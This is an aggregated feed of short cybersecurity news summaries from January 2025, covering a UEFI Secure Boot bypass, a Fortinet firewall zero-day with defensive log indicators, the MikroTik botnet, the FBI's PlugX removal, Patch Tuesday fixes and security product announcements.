    Autosummary: List of vulnerable software products: Howyar SysReturn before version 10.2.023_20240919; Greenware GreenGuard before version 10.2.023-20240927; Radix SmartRecovery before version 11.2.023-20240927; Sanfong EZ-back System before version 10.3.024-20241127; WASAY eRecoveryRX before version 8.4.022-20241127; CES NeoImpact before version 10.1.024-20241127; SignalComputer HDD King before version 10.3.021-20241127. “The number of UEFI vulnerabilities discovered in recent years and the failures in patching them or revoking vulnerable binaries within a reasonable time window shows that even such an essential feature as UEFI Secure Boot should not be considered an impenetrable barrier,” says ESET researcher Martin Smolár, who discovered the vulnerability. "


    Cisco AI Defense safeguards against the misuse of AI tools

    Linux
    2025-01-16 https://www.helpnetsecurity.com/2025/01/16/cisco-ai-defense/

    Cisco announced Cisco AI Defense, a pioneering solution to enable and safeguard AI transformation within enterprises. As AI technology advances, new safety concerns and security threats are emerging at an unprecedented speed which existing security solutions are unprepared to protect against. Cisco AI Defense is purpose-built for enterprises to develop, deploy and secure AI applications with confidence. “Business and technology leaders can’t afford to sacrifice safety for speed when embracing AI,” said Jeetu Patel, EVP and … More

    The post Cisco AI Defense safeguards against the misuse of AI tools appeared first on Help Net Security.

    "

    Autosummary: Accuracy and trustworthiness are essential for protecting enterprise AI applications, and Cisco has been actively involved in developing AI security industry standards, including those from MITRE, OWASP, and NIST. AI Defense integrates seamlessly with existing data flows for unparalleled visibility and control and is built into the Security Cloud, Cisco’s unified, AI-driven, cross-domain security platform. Securing access to AI applications: As end users rush to adopt AI applications like summarization tools to improve their productivity, security teams need to prevent data leakage and the poisoning of proprietary data. "


    HarvestIQ.ai provides actionable insights for cybersecurity professionals

    ciber
    2025-01-16 https://www.helpnetsecurity.com/2025/01/16/harvestiq-ai-platform/

    IT-Harvest launched HarvestIQ.ai, a platform featuring two AI assistants designed to redefine how professionals navigate the cybersecurity landscape. The Analyst AI provides access to IT-Harvest’s comprehensive database of 4,070 cybersecurity vendors, offering users instant insights into market players, trends, and innovations. Meanwhile, the Architect AI empowers users with tailored guidance on cybersecurity products, leveraging IT-Harvest’s in-depth analysis of over 11,300 products to help organizations make informed decisions about their cybersecurity strategies. “HarvestIQ.ai is a game-changer … More

    The post HarvestIQ.ai provides actionable insights for cybersecurity professionals appeared first on Help Net Security.

    "

    Autosummary: "


    MikroTik botnet relies on DNS misconfiguration to spread malware

    exploits
    2025-01-16 https://securityaffairs.com/173126/hacking/13000-device-mikrotik-botnet-exploiting-dns-flaws.html
    Researchers discovered a 13,000-device MikroTik botnet exploiting DNS flaws to spoof 20,000 domains and deliver malware. Infoblox researchers discovered a botnet of 13,000 MikroTik devices that exploits DNS misconfigurations to bypass email protections, spoof approximately 20,000 domains, and deliver malware. In late November, the experts spotted a malspam campaign impersonating DHL which used emails about […] "

    Autosummary: MikroTik botnet relies on DNS misconfiguration to spread malware Pierluigi Paganini January 16, 2025 Researchers discovered a 13,000-device MikroTik botnet exploiting DNS flaws to spoof 20,000 domains and deliver malware. "


    New UEFI Secure Boot Vulnerability Could Allow Attackers to Load Malicious Bootkits

    exploits
    2025-01-16 https://thehackernews.com/2025/01/new-uefi-secure-boot-vulnerability.html
    Details have emerged about a now-patched security vulnerability that could allow a bypass of the Secure Boot mechanism in Unified Extensible Firmware Interface (UEFI) systems. The vulnerability, assigned the CVE identifier CVE-2024-7344 (CVSS score: 6.7), resides in a UEFI application signed by Microsoft's "Microsoft Corporation UEFI CA 2011" third-party UEFI certificate, according to a new "

    Autosummary: The affected UEFI application is part of several real-time system recovery software suites developed by Howyar Technologies Inc., Greenware Technologies, Radix Technologies Ltd., SANFONG Inc., Wasay Software Technology Inc., Computer Education System Inc., and Signal Computer GmbH: Howyar SysReturn before version 10.2.023_20240919; Greenware GreenGuard before version 10.2.023-20240927; Radix SmartRecovery before version 11.2.023-20240927; Sanfong EZ-back System before version 10.3.024-20241127; WASAY eRecoveryRX before version 8.4.022-20241127; CES NeoImpact before version 10.1.024-20241127; SignalComputer HDD King before version 10.3.021-20241127. "The vulnerability is caused by the use of a custom PE loader instead of using the standard and secure UEFI functions LoadImage and StartImage," ESET researcher Martin Smolár said. "


    Researchers Find Exploit Allowing NTLMv1 Despite Active Directory Restrictions

    exploits
    2025-01-16 https://thehackernews.com/2025/01/researchers-find-exploit-allowing.html
    Cybersecurity researchers have found that the Microsoft Active Directory Group Policy that's designed to disable NT LAN Manager (NTLM) v1 can be trivially bypassed by a misconfiguration. "A simple misconfiguration in on-premise applications can override the Group Policy, effectively negating the Group Policy designed to stop NTLMv1 authentications," Silverfort researcher Dor Segal said in a "

    Autosummary: Specifically, it leverages a data structure called NETLOGON_LOGON_IDENTITY_INFO, which contains a field named ParameterControl that, in turn, has a configuration to "Allow NTLMv1 authentication (MS-NLMP) when only NTLMv2 (NTLM) is allowed. "


    Hackers Hide Malware in Images to Deploy VIP Keylogger and 0bj3ctivity Stealer

    exploits
    2025-01-16 https://thehackernews.com/2025/01/hackers-hide-malware-in-images-to.html
    Threat actors have been observed concealing malicious code in images to deliver malware such as VIP Keylogger and 0bj3ctivity Stealer as part of separate campaigns. "In both campaigns, attackers hid malicious code in images they uploaded to archive[.]org, a file-hosting website, and used the same .NET loader to install their final payloads," HP Wolf Security said in its Threat Insights Report "

    Autosummary: "In both campaigns, attackers hid malicious code in images they uploaded to archive[.]org, a file-hosting website, and used the same .NET loader to install their final payloads," HP Wolf Security said in its Threat Insights Report for Q3 2024 shared with The Hacker News. "


    Cuba frees first jailed anti-government protesters after US deal

    government
    2025-01-16 https://www.bbc.com/news/articles/c8edw201jx6o
    There is joy among families of those freed, but also concern that the deal may not last for long. "

    Autosummary: Earlier, Trump's choice for national security adviser, Mike Waltz, had said on Fox News that "anything they [the Biden administration] are doing right now, we can do back, and no one should be under any illusion in terms of a change in Cuba policy". "


    Biden signs executive order to bolster national cybersecurity

    ciber
    2025-01-16 https://www.bleepingcomputer.com/news/security/biden-signs-executive-order-to-bolster-national-cybersecurity/
    Days before leaving office, President Joe Biden signed an executive order to shore up the United States' cybersecurity by making it easier to sanction hacking groups targeting federal agencies and the nation's critical infrastructure. [...] "

    Autosummary: "


    Wolf Haldenstein law firm says 3.5 million impacted by data breach

    financial
    2025-01-16 https://www.bleepingcomputer.com/news/security/wolf-haldenstein-law-firm-says-35-million-impacted-by-data-breach/
    Wolf Haldenstein Adler Freeman & Herz LLP ("Wolf Haldenstein") reports it has suffered a data breach that exposed the personal information of nearly 3.5 million individuals to hackers. [...] "

    Autosummary: Although the law firm says it has no evidence the exposed data has been misused, it warns impacted individuals that hackers may be holding the following information about them: full name, Social Security number (SSN), Employee Identification number, medical diagnosis, medical claim information. Exposure of this data steeply increases the risk of phishing, scams, social engineering, and other targeted attacks on impacted individuals. "


    Russian Star Blizzard Shifts Tactics to Exploit WhatsApp QR Codes for Credential Harvesting

    exploits industry rusia-ucrania financial
    2025-01-16 https://thehackernews.com/2025/01/russian-star-blizzard-shifts-tactics-to.html
    The Russian threat actor known as Star Blizzard has been linked to a new spear-phishing campaign that targets victims' WhatsApp accounts, signaling a departure from its longstanding tradecraft in a likely attempt to evade detection. "Star Blizzard's targets are most commonly related to government or diplomacy (both incumbent and former position holders), defense policy or international relations "

    Autosummary: Active since at least 2012, it's also tracked under the monikers Blue Callisto, BlueCharlie (or TAG-53), Calisto (alternately spelled Callisto), COLDRIVER, Dancing Salome, Gossamer Bear, Iron Frontier, TA446, and UNC4057. "


    Clop Ransomware exploits Cleo File Transfer flaw: dozens of claims, disputed breaches

    exploits ransomware
    2025-01-16 https://securityaffairs.com/173135/cyber-crime/clop-ransomware-gang-claims-hack-of-cleo-file-transfer-customers.html
    The Clop ransomware gang claims dozens of victims from a Cleo file transfer vulnerability, though several companies dispute the breaches. The Clop ransomware group added 59 new companies to its leak site; the gang claims to have breached them by exploiting a vulnerability in Cleo file transfer products. “We have data of many companies who […] "

    Autosummary: Clop Ransomware exploits Cleo File Transfer flaw: dozens of claims, disputed breaches Pierluigi Paganini January 16, 2025 The Clop ransomware gang claims dozens of victims from a Cleo file transfer vulnerability, though several companies dispute the breaches. "


    Prominent US law firm Wolf Haldenstein disclosed a data breach

    financial
    2025-01-16 https://securityaffairs.com/173150/data-breach/us-law-firm-wolf-haldenstein-data-breach.html
    The law firm Wolf Haldenstein disclosed a data breach that exposed the personal information of nearly 3.5 million individuals. The law firm Wolf Haldenstein disclosed a 2023 data breach that exposed the personal information of nearly 3.5 million individuals. Wolf Haldenstein Adler Freeman & Herz LLP is a prominent U.S.-based law firm that specializes in […] "

    Autosummary: Its expertise spans securities litigation, addressing corporate fraud and misrepresentation; antitrust law, targeting anti-competitive practices; consumer protection, focusing on deceptive practices and product liability; data privacy and cybersecurity, dealing with breaches and unauthorized data collection; and shareholder derivative actions, advocating for shareholders against corporate mismanagement. "


    UK government proposes ransomware payment ban for public sector

    exploits government ransomware
    2025-01-16 https://www.exponential-e.com/blog/uk-government-proposes-ransomware-payment-ban-for-public-sector
    The UK government has proposed extending its ban on ransomware payments to cover the entire public sector in an attempt to deter cybercriminal attacks and protect taxpayers. But is a ban a good idea? Read more in my article on the Exponential-e blog. "

    Autosummary: "


    Cybersecurity is stepping into a new era of complexity

    ciber
    2025-01-15 https://www.helpnetsecurity.com/2025/01/15/cybersecurity-complexity-era/

    Cybersecurity is entering a new era of complexity, according to the World Economic Forum’s Global Cybersecurity Outlook 2025 report. Growing complexity intensifies cyber inequity This complexity arises from the rapid growth of emerging technologies, prevailing geopolitical uncertainty, the evolution of threats, regulatory challenges, vulnerabilities in supply chain interdependencies and the growing cyber skills gap. Growing complexity further intensifies cyber inequity, deepening the divide between developed and emerging economies, expanding sectoral disparities, and widening the gap … More

    The post Cybersecurity is stepping into a new era of complexity appeared first on Help Net Security.

    "

    Autosummary: Growing complexity intensifies cyber inequity This complexity arises from the rapid growth of emerging technologies, prevailing geopolitical uncertainty, the evolution of threats, regulatory challenges, vulnerabilities in supply chain interdependencies and the growing cyber skills gap. "


    FBI Deletes PlugX Malware from 4,250 Hacked Computers in Multi-Month Operation

    exploits
    2025-01-15 https://thehackernews.com/2025/01/fbi-deletes-plugx-malware-from-4250.html
    The U.S. Department of Justice (DoJ) on Tuesday disclosed that a court-authorized operation allowed the Federal Bureau of Investigation (FBI) to delete PlugX malware from over 4,250 infected computers as part of a "multi-month law enforcement operation." PlugX, also known as Korplug, is a remote access trojan (RAT) widely used by threat actors associated with the People's Republic of China (PRC "

    Autosummary: "


    3 Actively Exploited Zero-Day Flaws Patched in Microsoft's Latest Security Update

    exploits
    2025-01-15 https://thehackernews.com/2025/01/3-actively-exploited-zero-day-flaws.html
    Microsoft kicked off 2025 with a new set of patches for a total of 161 security vulnerabilities across its software portfolio, including three zero-days that have been actively exploited in attacks. Of the 161 flaws, 11 are rated Critical, and 149 are rated Important in severity. One other flaw, a non-Microsoft CVE related to a Windows Secure Boot bypass (CVE-2024-7344), has not been assigned "

    Autosummary: Separately, Redmond has warned that five of the bugs are publicly known: CVE-2025-21186, CVE-2025-21366, CVE-2025-21395 (CVSS scores: 7.8) - Microsoft Access Remote Code Execution Vulnerability; CVE-2025-21275 (CVSS score: 7.8) - Windows App Package Installer Elevation of Privilege Vulnerability; CVE-2025-21308 (CVSS score: 6.5) - Windows Themes Spoofing Vulnerability. It's worth noting that CVE-2025-21308, which could lead to improper disclosure of an NTLM hash, was previously flagged by 0patch as a bypass for CVE-2024-38030. The update is also notable for closing out five Critical severity flaws: CVE-2025-21294 (CVSS score: 8.1) - Microsoft Digest Authentication Remote Code Execution Vulnerability; CVE-2025-21295 (CVSS score: 8.1) - SPNEGO Extended Negotiation (NEGOEX) Security Mechanism Remote Code Execution Vulnerability; CVE-2025-21298 (CVSS score: 9.8) - Windows Object Linking and Embedding (OLE) "


    CVE-2024-44243 macOS flaw allows persistent malware installation

    exploits
    2025-01-15 https://securityaffairs.com/173082/hacking/apple-macos-system-integrity-protection-sip-flaw.html
    Microsoft disclosed details of a vulnerability in Apple macOS that could have allowed an attacker to bypass the OS’s System Integrity Protection (SIP). Microsoft disclosed details of a now-patched macOS flaw, tracked as CVE-2024-44243 (CVSS score: 5.5), that allows attackers with “root” access to bypass System Integrity Protection (SIP). SIP in macOS safeguards the system by […]

    Autosummary: “As described by Csaba Fitzl of Kandji in POC2024, upon mounting, the disk utility consults a specialized daemon known as the Storage Kit daemon (storagekitd), which, in turn, uses the Disk Arbitration daemon (diskarbitrationd) to invoke the right mount process via posix_spawn,” Microsoft concludes. “Bypassing SIP could lead to serious consequences, such as increasing the potential for attackers and malware authors to successfully install rootkits, create persistent malware, bypass Transparency, Consent and Control (TCC), and expand the attack surface for additional techniques and exploits.”


    FBI removed PlugX malware from U.S. computers

    exploits
    2025-01-15 https://www.helpnetsecurity.com/2025/01/15/fbi-removed-plugx-malware-from-u-s-computers/

    The Justice Department announced on Tuesday that, alongside international partners, the FBI deleted “PlugX” malware from thousands of infected computers worldwide. As described in court documents unsealed in the Eastern District of Pennsylvania, a group of hackers sponsored by the People’s Republic of China (PRC), known to the private sector as “Mustang Panda” and “Twill Typhoon,” used a version of PlugX malware to infect, control, and steal information from victim computers. According to court documents, … More

    The post FBI removed PlugX malware from U.S. computers appeared first on Help Net Security.



    North Korean IT Worker Fraud Linked to 2016 Crowdfunding Scam and Fake Domains

    financial
    2025-01-15 https://thehackernews.com/2025/01/north-korean-it-worker-fraud-linked-to.html
    Cybersecurity researchers have identified infrastructure links between the North Korean threat actors behind the fraudulent IT worker schemes and a 2016 crowdfunding scam. The new evidence suggests that Pyongyang-based threat groups may have pulled off illicit money-making scams that predate the use of IT workers, SecureWorks Counter Threat Unit (CTU) said in a report shared with The Hacker

    Autosummary: "The advanced persistent threat groups affiliated with the DPRK, including the Lazarus Group, [...] continue to demonstrate a pattern of malicious behavior in cyberspace by conducting numerous cybercrime campaigns to steal cryptocurrency and targeting exchanges, digital asset custodians, and individual users," the governments said.


    The High-Stakes Disconnect For ICS/OT Security

    industry
    2025-01-15 https://thehackernews.com/2025/01/the-high-stakes-disconnect-for-icsot.html
    Why does ICS/OT need specific controls and its own cybersecurity budget today? Because treating ICS/OT security with an IT security playbook isn’t just ineffective—it’s high risk. In the rapidly evolving domain of cybersecurity, the specific challenges and needs for Industrial Control Systems (ICS) and Operational Technology (OT) security distinctly stand out from traditional IT security. ICS/OT

    Autosummary: For example, mature organizations cite the main benefits of this control as directly contributing to safety and engineering across the following areas:
    - Safe, passive industrial traffic analysis to identify engineering assets to build an ICS/OT asset inventory
    - Engineering troubleshooting capabilities
    - Safe, passive industrial traffic analysis to identify engineering system vulnerabilities
    - Industrial and engineering-driven specific incident response capabilities
    - Meeting compliance requirements
    Strategic Realignment Opportunities: It is worth reevaluating ICS/OT risks, impacts, budgets, and controls to protect what makes an ICS organization a business – the engineering and operating technology systems. ICS/OT engineering systems, which power critical infrastructure such as electric power grids, oil and gas processing, heavy manufacturing, food and beverage processes, and water management facilities, require tailored cybersecurity strategies and controls.


    U.S. CISA adds Fortinet FortiOS to its Known Exploited Vulnerabilities catalog

    exploits
    2025-01-15 https://securityaffairs.com/173098/security/u-s-cisa-adds-fortinet-fortios-known-exploited-vulnerabilities-catalog.html
    U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds Fortinet FortiOS vulnerability to its Known Exploited Vulnerabilities catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added a Fortinet FortiOS authorization bypass vulnerability, tracked as CVE-2024-55591 (CVSS score: 9.6), to its Known Exploited Vulnerabilities (KEV) catalog. Remote attackers can exploit the vulnerability to bypass authentication and gain […]


    Codefinger ransomware gang uses compromised AWS keys to encrypt S3 bucket

    exploits ransomware
    2025-01-15 https://securityaffairs.com/173089/cyber-crime/codefinger-ransomware-gang-encrypts-s3-bucket.html
    The ransomware group Codefinger is using compromised AWS keys to encrypt S3 bucket data using SSE-C, Halcyon researchers warn. The ransomware group Codefinger has been spotted using compromised AWS keys to encrypt data in S3 buckets. The threat actor used AWS’s Server-Side Encryption with Customer Provided Keys (SSE-C) for encryption, then demanded the payment of […]

    Autosummary: The Codefinger ransomware campaign targeting AWS SSE-C encryption is highly dangerous due to irreversible data loss without the attacker’s key, limited forensic evidence in AWS CloudTrail logs, and the potential to significantly disrupt critical data storage on Amazon S3. Organizations are recommended to protect themselves by hardening AWS environments: restrict SSE-C usage with IAM policies, monitor and audit AWS keys, enable detailed S3 logging, and collaborate with AWS support. The threat actor looks for keys with permissions to write and read S3 objects (s3:GetObject and s3:PutObject requests), and then launches the encryption process by issuing requests that set the x-amz-server-side-encryption-customer-algorithm header.


    Windows BitLocker bug triggers warnings on devices with TPMs

    exploits
    2025-01-15 https://www.bleepingcomputer.com/news/microsoft/windows-bitlocker-bug-triggers-warnings-on-devices-with-tpms/
    Microsoft is investigating a bug triggering security alerts on systems with a Trusted Platform Module (TPM) processor after enabling BitLocker. [...]

    Autosummary: More than three years later, in December 2024, Redmond made it abundantly clear that TPM 2.0 support is a "non-negotiable" requirement, as customers won't be able to upgrade to Windows 11 without it.


    Google Ads Users Targeted in Malvertising Scam Stealing Credentials and 2FA Codes

    financial
    2025-01-15 https://thehackernews.com/2025/01/google-ads-users-targeted-in.html
    Cybersecurity researchers have alerted to a new malvertising campaign that's targeting individuals and businesses advertising via Google Ads by attempting to phish for their credentials via fraudulent ads on Google. "The scheme consists of stealing as many advertiser accounts as possible by impersonating Google Ads and redirecting victims to fake login pages," Jérôme Segura, senior director of

    Autosummary: The disclosure comes as Trend Micro revealed that attackers are using platforms such as YouTube and SoundCloud to distribute links to fake installers for pirated versions of popular software that ultimately lead to the deployment of various malware families such as Amadey, Lumma Stealer, Mars Stealer, Penguish, PrivateLoader, and Vidar Stealer.


    MikroTik botnet uses misconfigured SPF DNS records to spread malware

    exploits
    2025-01-15 https://www.bleepingcomputer.com/news/security/mikrotik-botnet-uses-misconfigured-spf-dns-records-to-spread-malware/
    A newly discovered botnet of 13,000 MikroTik devices uses a misconfiguration in domain name server records to bypass email protections and deliver malware by spoofing roughly 20,000 web domains. [...]

    Autosummary: "This essentially defeats the purpose of having an SPF record, because it opens the door for spoofing and unauthorized email sending," Infoblox said. A safer choice is using the "-all" option, which limits email sending to the servers specified by the domain.


    Microsoft Patch Tuesday updates for January 2025 fixed three actively exploited flaws

    exploits
    2025-01-15 https://securityaffairs.com/173102/security/microsoft-patch-tuesday-updates-for-january-2025.html
    Microsoft Patch Tuesday security updates for January 2025 addressed 161 vulnerabilities, including three actively exploited issues. Microsoft Patch Tuesday security updates for January 2025 addressed 161 vulnerabilities in Windows and Windows Components, Office and Office Components, Hyper-V, SharePoint Server, .NET and Visual Studio, Azure, BitLocker, Remote Desktop Services, and Windows Virtual Trusted Platform Module. 11 […]

    Autosummary: Microsoft Patch Tuesday security updates for January 2025 addressed 161 vulnerabilities in Windows and Windows Components, Office and Office Components, Hyper-V, SharePoint Server, .NET and Visual Studio, Azure, BitLocker, Remote Desktop Services, and Windows Virtual Trusted Platform Module.



    How AI and ML are transforming digital banking security

    financial
    2025-01-14 https://www.helpnetsecurity.com/2025/01/14/nuno-martins-da-silveira-teodoro-solaris-ai-digital-banking-security/

    In this Help Net Security interview, Nuno Martins da Silveira Teodoro, VP of Group Cybersecurity at Solaris, discusses the latest advancements in digital banking security. He talks about how AI and ML are reshaping fraud detection, the growing trend of passwordless authentication, and the security risks facing mobile banking apps. Nuno also discusses the balance between ensuring security and providing a seamless, user-friendly experience for customers.

    The post How AI and ML are transforming digital banking security appeared first on Help Net Security.

    Autosummary: Traditional passwords are being replaced with more secure and user-friendly methods, such as biometrics (fingerprints, facial recognition), hardware tokens or behavioral authentication leveraging unique user characteristics or devices to verify identity, reducing reliance on passwords, which are prone to theft, reuse, and phishing attacks. For example, low-risk activities like balance checks might require only basic authentication, while high-risk actions, such as large transfers, prompt multi-factor authentication. By combining advanced technologies, proactive monitoring, and user education, banks can significantly reduce risks and ensure the safety of their mobile banking platforms, maintaining trust in an increasingly digital-first world. Last but not least, banks should also invest in AI-driven fraud detection capabilities on the end user’s devices to allow safe and frictionless online customer journeys by integrating industry-leading threat intel, behavioral analytics, and advanced device fingerprinting with adaptive fraud indicators to monitor for anomalies in real time and promptly address threats.


    Cybersecurity jobs available right now: January 14, 2025

    ciber
    2025-01-14 https://www.helpnetsecurity.com/2025/01/14/cybersecurity-jobs-available-right-now-january-14-2025/

    Application Security DevOps engineer – Twixor | India | On-site
    As an Application Security DevOps engineer, you will implement and oversee application security measures to protect the company’s software and infrastructure. Conduct regular security assessments and vulnerability testing. Develop and maintain secure coding practices and standards. Design, implement, and maintain secure CI/CD pipelines. Perform threat modeling and risk assessments.
    CISO – Degroof Petercam | Belgium | Hybrid
    As a CISO, … More

    The post Cybersecurity jobs available right now: January 14, 2025 appeared first on Help Net Security.

    Autosummary:
    Senior Security Engineer, Offensive Security – VXI Global Solutions | USA | Hybrid
    As a Senior Security Engineer, Offensive Security, you will manage complete red team exercises, drive security improvement across the organization, and research emerging attack vectors, vulnerabilities and techniques.
    Cloud Security Engineer (Azure) – Tech Mahindra | UAE | On-site
    As a Cloud Security Engineer (Azure), you will implement and configure cloud security controls and policies, manage access to data, and monitor threats to ensure that apps, containers, infrastructure, and networks are protected. Perform full, detailed security risk assessments and penetration tests on a wide variety of high or critical business solutions that include but are not limited to software, hardware, networks, and mobile devices as well as complex solutions that may include any number of the above configurations.
    Security Researcher – Lasso Security | Israel | On-site
    As a Security Researcher, you will design and lead technical security research in the field of LLMs.
    Cybersecurity Engineer, Resilience – Electrolux Group | Czechia | On-site
    As a Cybersecurity Engineer, Resilience, you will perform risk assessment tests and audits of connected systems for cybersecurity issues, identify security vulnerabilities in digital products, applications, systems and infrastructure, and drive their mitigation.


    Zero-Day Vulnerability Suspected in Attacks on Fortinet Firewalls with Exposed Interfaces

    exploits
    2025-01-14 https://thehackernews.com/2025/01/zero-day-vulnerability-suspected-in.html
    Threat hunters are calling attention to a new campaign that has targeted Fortinet FortiGate firewall devices with management interfaces exposed on the public internet. "The campaign involved unauthorized administrative logins on management interfaces of firewalls, creation of new accounts, SSL VPN authentication through those accounts, and various other configuration changes," cybersecurity firm

    Autosummary: The digital break-ins, in a nutshell, involved the attackers logging in to the firewall management interfaces to make configuration changes, including modifying the output setting from "standard" to "more," as part of early reconnaissance efforts, before making more extensive changes to create new super admin accounts at the start of December 2024.


    Russian-Linked Hackers Target Kazakhstan in Espionage Campaign with HATVIBE Malware

    exploits rusia-ucrania
    2025-01-14 https://thehackernews.com/2025/01/russian-linked-hackers-target.html
    Russia-linked threat actors have been attributed to an ongoing cyber espionage campaign targeting Kazakhstan as part of the Kremlin's efforts to gather economic and political intelligence in Central Asia. The campaign has been assessed to be the work of an intrusion set dubbed UAC-0063, which likely shares overlap with APT28, a nation-state group affiliated with Russia's General Staff Main

    Autosummary: It's also known as Blue Athena, BlueDelta, Fancy Bear, Fighting Ursa, Forest Blizzard, FROZENLAKE, Iron Twilight, ITG05, Pawn Storm, Sednit, Sofacy, and TA422.


    Threat actors exploit Aviatrix Controller flaw to deploy backdoors and cryptocurrency miners

    exploits
    2025-01-14 https://securityaffairs.com/173037/cyber-crime/aviatrix-controller-flaw-active-exploitation.html
    A critical vulnerability in Aviatrix Controller is actively exploited to deploy backdoors and cryptocurrency miners in the wild. Security researcher Jakub Korepta discovered a critical vulnerability, tracked as CVE-2024-50603 (CVSS score: 10.0), in the Aviatrix Controller. The flaw impacts Aviatrix Controller pre-7.1.4191 and 7.2.x pre-7.2.4996; it allows unauthenticated attackers to execute arbitrary code via improper command […]

    Autosummary: A critical vulnerability in Aviatrix Controller is actively exploited to deploy backdoors and cryptocurrency miners in the wild.


    Fortinet warns of auth bypass zero-day exploited to hijack firewalls

    exploits
    2025-01-14 https://www.bleepingcomputer.com/news/security/fortinet-warns-of-auth-bypass-zero-day-exploited-to-hijack-firewalls/
    Attackers are exploiting a new authentication bypass zero-day vulnerability in FortiOS and FortiProxy to hijack Fortinet firewalls and breach enterprise networks. [...]

    Autosummary: Fortinet and Arctic Wolf shared almost identical IOCs, stating that you can examine logs for the following entries to determine if devices were targeted. Login activity log with random srcip and dstip:
    type="event" subtype="system" level="information" vd="root" logdesc="Admin login successful" sn="1733486785" user="admin" ui="jsconsole" method="jsconsole" srcip=1.1.1.1 dstip=1.1.1.1 action="login" status="success" reason="none" profile="super_admin" msg="Administrator admin logged in successfully from jsconsole"
    Admin creation log with seemingly randomly generated user name and source IP:
    type="event" subtype="system" level="information" vd="root" logdesc="Object attribute configured" user="admin" ui="jsconsole(127.0.0.1)" action="Add" cfgtid=1411317760 cfgpath="system.admin" cfgobj="vOcep" cfgattr="password[*]accprofile[super_admin]vdom[root]" msg="Add system.admin vOcep"
    The security companies also warned that the attackers commonly used the following IP addresses in attacks: 1.1.1.1, 127.0.0.1, 2.2.2.2, 8.8.8.8, 8.8.4.4. Arctic Wolf says it notified Fortinet about the attacks on December 12, 2024, and received confirmation from FortiGuard Labs PSIRT on December 17, 2024, that this activity was known and was already under investigation.


    A new campaign is likely targeting a zero-day in Fortinet FortiGate firewalls

    exploits
    2025-01-14 https://securityaffairs.com/173050/hacking/attackers-target-zero-day-in-fortinet-fortigate-firewalls.html
    Experts warn of a new campaign targeting an alleged zero-day in Fortinet FortiGate firewalls with management interfaces exposed online. Arctic Wolf researchers observed a campaign targeting Fortinet FortiGate firewalls with exposed management interfaces, likely exploiting a zero-day vulnerability. Threat actors gained unauthorized access to network devices, created accounts, and modified configurations. Experts urge organizations to […]

    Autosummary: The campaign likely began in November 2024 and unfolded in four phases: vulnerability scanning (Nov 16–23, 2024), reconnaissance (Nov 22–27), SSL VPN setup (Dec 4–7), and lateral movement (Dec 16–27).


    Microsoft January 2025 Patch Tuesday fixes 8 zero-days, 159 flaws

    exploits
    2025-01-14 https://www.bleepingcomputer.com/news/microsoft/microsoft-january-2025-patch-tuesday-fixes-8-zero-days-159-flaws/
    Today is Microsoft's January 2025 Patch Tuesday, which includes security updates for 159 flaws, including eight zero-day vulnerabilities, with three actively exploited in attacks. [...]

    Autosummary: Microsoft has mitigated this issue by blocking access to the following Microsoft Access documents if they were sent via email: accdb, accde, accdw, accdt, accda, accdr, accdu. What makes this interesting is that Unpatched.ai, an AI-assisted vulnerability discovery platform, has discovered all three flaws.


    FBI wipes Chinese PlugX malware from over 4,000 US computers

    exploits
    2025-01-14 https://www.bleepingcomputer.com/news/security/fbi-wipes-chinese-plugx-malware-from-over-4-000-us-computers/
    The U.S. Department of Justice announced today that the FBI has deleted Chinese PlugX malware from over 4,200 computers in networks across the United States. [...]

    Autosummary: According to court documents, the list of victims targeted using this malware includes "European shipping companies in 2024, several European Governments from 2021 to 2023, worldwide Chinese dissident groups, and governments throughout the Indo-Pacific (e.g., Taiwan, Hong Kong, Japan, South Korea, Mongolia, India, Myanmar, Indonesia, Philippines, Thailand, Vietnam, and Pakistan)."


    Fortinet fixes FortiOS zero-day exploited by attackers for months (CVE-2024-55591)

    exploits
    2025-01-14 https://www.helpnetsecurity.com/2025/01/14/fortinet-fortigate-zero-day-vulnerability-exploited-cve-2024-55591/

    Fortinet has patched an authentication bypass vulnerability (CVE-2024-55591) affecting its FortiOS firewalls and FortiProxy web gateways that has been exploited as a zero-day by attackers to compromise publicly exposed FortiGate firewalls. While Fortinet acknowledged in-the-wild exploitation in the accompanying security advisory, it did not share any attack-related information except indicators of compromise (IoCs): IP addresses, log entries, created users, and a list of operations performed by the threat actor. Some of those IoCs overlap with those shared … More

    The post Fortinet fixes FortiOS zero-day exploited by attackers for months (CVE-2024-55591) appeared first on Help Net Security.

    Autosummary: The campaign unfolded in four distinct phases:
    - Automated vulnerability scanning (+ zero-day exploitation + numerous successful admin login events) – from November 16, 2024 to November 23, 2024
    - Reconnaissance (+ configuration changes, the purpose of which is still unknown) – from November 22, 2024 to November 27, 2024
    - Creation of new super admin and local user accounts or hijacking of existing accounts + adding of those accounts to existing groups for SSL VPN access + creating new SSL VPN portals + establishing SSL VPN tunnels with the affected devices – from December 4, 2024 to December 7, 2024
    - Extracting credentials for lateral movement – from December 16, 2024 to December 27, 2024


    Microsoft Uncovers macOS Vulnerability CVE-2024-44243 Allowing Rootkit Installation

    exploits
    2025-01-14 https://thehackernews.com/2025/01/microsoft-uncovers-macos-vulnerability.html
    Microsoft has shed light on a now-patched security flaw impacting Apple macOS that, if successfully exploited, could have allowed an attacker running as "root" to bypass the operating system's System Integrity Protection (SIP) and install malicious kernel drivers by loading third-party kernel extensions. The vulnerability in question is CVE-2024-44243 (CVSS score: 5.5), a medium-severity bug


    Google OAuth Vulnerability Exposes Millions via Failed Startup Domains

    exploits
    2025-01-14 https://thehackernews.com/2025/01/google-oauth-vulnerability-exposes.html
    New research has pulled back the curtain on a "deficiency" in Google's "Sign in with Google" authentication flow that exploits a quirk in domain ownership to gain access to sensitive data. "Google's OAuth login doesn't protect against someone purchasing a failed startup's domain and using it to re-create email accounts for former employees," Truffle Security co-founder and CEO Dylan Ayrey said

    Autosummary: "The most sensitive accounts included HR systems, which contained tax documents, pay stubs, insurance information, social security numbers, and more," Ayrey said.


    Russia-linked APT UAC-0063 targets Kazakhstan with HATVIBE malware

    exploits
    2025-01-14 https://securityaffairs.com/173064/apt/uac-0063-target-kazakhstan-hatvibe-malware.html
    Russia-linked threat actor UAC-0063 targets Kazakhstan to gather economic and political intelligence in Central Asia. Russia-linked threat actor UAC-0063 is targeting Kazakhstan as part of a cyber espionage campaign to gather economic and political intelligence in Central Asia. The Computer Emergency Response Team of Ukraine (CERT-UA) first detailed the activity of UAC-0063 in early 2023. […]

